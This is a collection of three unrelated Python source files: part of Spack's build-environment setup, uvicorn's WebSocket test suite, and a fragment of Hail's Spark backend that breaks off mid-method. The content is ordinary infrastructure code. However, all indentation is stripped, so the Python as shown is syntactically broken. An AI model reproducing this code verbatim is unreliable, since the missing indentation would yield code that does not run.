env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch or 'cray' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
build_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, build_env)
set_build_environment_variables(pkg, build_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, build_env)
build_env.extend(
modifications_from_dependencies(pkg.spec, context='build')
)
if (not dirty) and (not build_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_build_environment(build_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the build_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
# kludge to handle cray libsci being automatically loaded by PrgEnv
# modules on cray platform. Module unload does no damage when
# unnecessary
module('unload', 'cray-libsci')
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
implicit_rpaths = pkg.compiler.implicit_rpaths()
if implicit_rpaths:
build_env.set('SPACK_COMPILER_IMPLICIT_RPATHS',
':'.join(implicit_rpaths))
# Make sure nothing's strange about the Spack environment.
validate(build_env, tty.warn)
build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopPhase as e:
# Do not create a full ChildError from this, it's not an error
# it's a control statement.
child_pipe.send(e)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# If returns a StopPhase, raise it
if isinstance(child_result, StopPhase):
# do not print
raise child_result
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
if isinstance(child_result, ChildError):
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
class StopPhase(spack.error.SpackError):
"""Pickle-able exception to control stopped builds."""
def __reduce__(self):
return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
return StopPhase(msg, long_msg)
|
test_websocket.py
|
import asyncio
import functools
import threading
import requests
import pytest
import websockets
from contextlib import contextmanager
from uvicorn.protocols.http import HttpToolsProtocol
class WebSocketResponse:
persist = False
def __init__(self, scope):
self.scope = scope
async def __call__(self, receive, send):
self.send = send
if self.persist:
while True:
message = await receive()
await self.handle(message)
else:
message = await receive()
await self.handle(message)
async def handle(self, message):
message_type = message["type"].replace(".", "_")
handler = getattr(self, message_type)
await handler(message)
def run_loop(loop):
loop.run_forever()
loop.close()
@contextmanager
def run_server(app):
asyncio.set_event_loop(None)
loop = asyncio.new_event_loop()
protocol = functools.partial(HttpToolsProtocol, app=app, loop=loop)
create_server_task = loop.create_server(protocol, host="127.0.0.1")
server = loop.run_until_complete(create_server_task)
url = "ws://127.0.0.1:%d/" % server.sockets[0].getsockname()[1]
try:
# Run the event loop in a new thread.
thread = threading.Thread(target=run_loop, args=[loop])
thread.start()
# Return the contextmanager state.
yield url
finally:
# Close the loop from our main thread.
loop.call_soon_threadsafe(loop.stop)
thread.join()
def test_invalid_upgrade():
def app(scope):
pass
with run_server(app) as url:
url = url.replace("ws://", "http://")
response = requests.get(
url, headers={"upgrade": "websocket", "connection": "upgrade"}, timeout=5
)
assert response.status_code == 403
def test_accept_connection():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def open_connection(url):
async with websockets.connect(url) as websocket:
return websocket.open
with run_server(App) as url:
loop = asyncio.new_event_loop()
is_open = loop.run_until_complete(open_connection(url))
assert is_open
loop.close()
def test_send_text_data_to_client():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "text": "123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(get_data(url))
assert data == "123"
loop.close()
def test_send_binary_data_to_client():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "bytes": b"123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(get_data(url))
assert data == b"123"
loop.close()
def test_send_and_close_connection():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.close", "text": "123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
is_open = True
try:
await websocket.recv()
except:
is_open = False
return (data, is_open)
with run_server(App) as url:
loop = asyncio.new_event_loop()
(data, is_open) = loop.run_until_complete(get_data(url))
assert data == "123"
assert not is_open
loop.close()
def test_send_text_data_to_server():
class App(WebSocketResponse):
persist = True
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def websocket_receive(self, message):
_text = message.get("text")
await self.send({"type": "websocket.send", "text": _text})
async def send_text(url):
async with websockets.connect(url) as websocket:
await websocket.send("abc")
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(send_text(url))
assert data == "abc"
loop.close()
def test_send_binary_data_to_server():
class App(WebSocketResponse):
persist = True
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def websocket_receive(self, message):
_bytes = message.get("bytes")
await self.send({"type": "websocket.send", "bytes": _bytes})
async def send_text(url):
async with websockets.connect(url) as websocket:
await websocket.send(b"abc")
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(send_text(url))
assert data == b"abc"
loop.close()
def test_send_after_protocol_close():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.close", "text": "123"})
with pytest.raises(Exception):
await self.send({"type": "websocket.send", "text": "1234"})
async def get_data(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
is_open = True
try:
await websocket.recv()
except:
is_open = False
return (data, is_open)
with run_server(App) as url:
loop = asyncio.new_event_loop()
(data, is_open) = loop.run_until_complete(get_data(url))
assert data == "123"
assert not is_open
loop.close()
def test_subprotocols():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept", "subprotocol": "proto1"})
async def get_subprotocol(url):
async with websockets.connect(
url, subprotocols=["proto1", "proto2"]
) as websocket:
return websocket.subprotocol
with run_server(App) as url:
loop = asyncio.new_event_loop()
subprotocol = loop.run_until_complete(get_subprotocol(url))
assert subprotocol == "proto1"
loop.close()
|
spark_backend.py
|
import pkg_resources
import sys
import os
import json
import socket
import socketserver
from threading import Thread
import py4j
import pyspark
from typing import List
import hail as hl
from hail.utils.java import Env, scala_package_object, scala_object
from hail.expr.types import dtype
from hail.expr.table_type import ttable
from hail.expr.matrix_type import tmatrix
from hail.expr.blockmatrix_type import tblockmatrix
from hail.ir.renderer import CSERenderer
from hail.ir import JavaIR
from hail.table import Table
from hail.matrixtable import MatrixTable
from .py4j_backend import Py4JBackend, handle_java_exception
from ..hail_logging import Logger
if pyspark.__version__ < '3' and sys.version_info > (3, 8):
raise EnvironmentError('Hail with spark {} requires Python 3.7, found {}.{}'.format(
pyspark.__version__, sys.version_info.major, sys.version_info.minor))
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(utils_package_object, host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
utils_package_object.addSocketAppender(host, port)
class Log4jLogger(Logger):
def __init__(self, log_pkg):
self._log_pkg = log_pkg
def error(self, msg):
self._log_pkg.error(msg)
def warning(self, msg):
self._log_pkg.warn(msg)
def info(self, msg):
self._log_pkg.info(msg)
class SparkBackend(Py4JBackend):
def __init__(self, idempotent, sc, spark_conf, app_name, master,
local, log, quiet, append, min_block_size,
branching_factor, tmpdir, local_tmpdir, skip_logging_configuration, optimizer_iterations):
super(SparkBackend, self).__init__()
if pkg_resources.resource_exists(__name__, "hail-all-spark.jar"):
hail_jar_path = pkg_resources.resource_filename(__name__, "hail-all-spark.jar")
assert os.path.exists(hail_jar_path), f'{hail_jar_path} does not exist'
conf = pyspark.SparkConf()
base_conf = spark_conf or {}
for k, v in base_conf.items():
conf.set(k, v)
jars = [hail_jar_path]
if os.environ.get('HAIL_SPARK_MONITOR') or os.environ.get('AZURE_SPARK') == '1':
import sparkmonitor
jars.append(os.path.join(os.path.dirname(sparkmonitor.__file__), 'listener.jar'))
conf.set("spark.extraListeners", "sparkmonitor.listener.JupyterSparkMonitorListener")
conf.set('spark.jars', ','.join(jars))
if os.environ.get('AZURE_SPARK') == '1':
print('AZURE_SPARK environment variable is set to "1", assuming you are in HDInsight.')
# Setting extraClassPath in HDInsight overrides the classpath entirely so you can't
# load the Scala standard library. Interestingly, setting extraClassPath is not
# necessary in HDInsight.
else:
conf.set('spark.driver.extraClassPath', ','.join(jars))
conf.set('spark.executor.extraClassPath', './hail-all-spark.jar')
if sc is None:
pyspark.SparkContext._ensure_initialized(conf=conf)
elif not quiet:
sys.stderr.write(
'pip-installed Hail requires additional configuration options in Spark referring\n'
' to the path to the Hail Python module directory HAIL_DIR,\n'
' e.g. /path/to/python/site-packages/hail:\n'
' spark.jars=HAIL_DIR/backend/hail-all-spark.jar\n'
' spark.driver.extraClassPath=HAIL_DIR/backend/hail-all-spark.jar\n'
' spark.executor.extraClassPath=./hail-all-spark.jar')
else:
pyspark.SparkContext._ensure_initialized()
self._gateway = pyspark.SparkContext._gateway
self._jvm = pyspark.SparkContext._jvm
hail_package = getattr(self._jvm, 'is').hail
self._hail_package = hail_package
self._utils_package_object = scala_package_object(hail_package.utils)
jsc = sc._jsc.sc() if sc else None
if idempotent:
self._jbackend = hail_package.backend.spark.SparkBackend.getOrCreate(
jsc, app_name, master, local, True, min_block_size, tmpdir, local_tmpdir)
self._jhc = hail_package.HailContext.getOrCreate(
self._jbackend, log, True, append, branching_factor, skip_logging_configuration, optimizer_iterations)
else:
self._jbackend = hail_package.backend.spark.SparkBackend.apply(
jsc, app_name, master, local, True, min_block_size, tmpdir, local_tmpdir)
self._jhc = hail_package.HailContext.apply(
self._jbackend, log, True, append, branching_factor, skip_logging_configuration, optimizer_iterations)
self._jsc = self._jbackend.sc()
if sc:
self.sc = sc
else:
self.sc = pyspark.SparkContext(gateway=self._gateway, jsc=self._jvm.JavaSparkContext(self._jsc))
self._jspark_session = self._jbackend.sparkSession()
self._spark_session = pyspark.sql.SparkSession(self.sc, self._jspark_session)
# This has to go after creating the SparkSession. Unclear why.
# Maybe it does its own patch?
install_exception_handler()
from hail.context import version
py_version = version()
jar_version = self._jhc.version()
if jar_version != py_version:
raise RuntimeError(f"Hail version mismatch between JAR and Python library\n"
f" JAR: {jar_version}\n"
f" Python: {py_version}")
self._fs = None
self._logger = None
if not quiet:
sys.stderr.write('Running on Apache Spark version {}\n'.format(self.sc.version))
if self._jsc.uiWebUrl().isDefined():
sys.stderr.write('SparkUI available at {}\n'.format(self._jsc.uiWebUrl().get()))
connect_logger(self._utils_package_object, 'localhost', 12888)
self._jbackend.startProgressBar()
def jvm(self):
return self._jvm
def hail_package(self):
return self._hail_package
def utils_package_object(self):
return self._utils_package_object
def stop(self):
self._jbackend.close()
self._jhc.stop()
self._jhc = None
self.sc.stop()
self.sc = None
uninstall_exception_handler()
def _parse_value_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_value_ir(
code,
{k: t._parsable_string() for k, t in ref_map.items()},
ir_map)
def _parse_table_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_table_ir(code, ref_map, ir_map)
def _parse_matrix_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_matrix_ir(code, ref_map, ir_map)
def _parse_blockmatrix_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_blockmatrix_ir(code, ref_map, ir_map)
@property
def logger(self):
if self._logger is None:
self._logger = Log4jLogger(self._utils_package_object)
return self._logger
@property
def fs(self):
if self._fs is None:
from hail.fs.hadoop_fs import HadoopFS
self._fs = HadoopFS(self._utils_package_object, self._jbackend.fs())
return self._fs
def _to_java_ir(self, ir, parse):
